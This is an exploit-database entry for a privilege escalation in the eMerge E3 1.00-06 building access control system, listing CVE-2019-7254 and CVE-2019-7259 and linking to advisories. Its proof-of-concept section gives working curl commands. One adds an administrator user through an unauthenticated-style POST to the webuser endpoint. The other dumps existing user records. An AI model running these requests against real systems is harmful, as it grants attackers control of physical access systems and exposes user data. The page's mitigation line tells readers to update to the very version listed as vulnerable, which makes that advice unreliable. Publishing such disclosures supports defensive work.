eMerge E3 1.00-06 - Privilege Escalation

vendor:

eMerge E3

by:

LiquidWorm

8.8

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: eMerge E3

Affected Version From: 1.00-06

Affected Version To: 1.00-06

Patch Exists: YES

Related CWE: CVE-2019-7254, CVE-2019-7259

CPE: a:linear_solutions:emerge_e3:1.00-06

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: NA

2018

eMerge E3 1.00-06 – Privilege Escalation

eMerge E3 1.00-06 is vulnerable to privilege escalation. An attacker can exploit this vulnerability by sending a malicious POST request to the web server. This request will add a new user with administrator privileges. An attacker can also disclose the existing users by sending a malicious GET request to the web server.

Mitigation:

Update to the latest version of eMerge E3 1.00-06

Source

Exploit-DB raw data:

# Exploit Title: eMerge E3 1.00-06 - Privilege Escalation
# Google Dork: NA
# Date: 2018-09-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7254, CVE-2019-7259
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005

# PoC
# Escalate:

curl "http://192.168.1.2/?c=webuser&m=update" -X POST –-data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1


Disclose:
curl "http://192.168.1.2/?c=webuser&m=select&p=&f=&w=&v=1" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1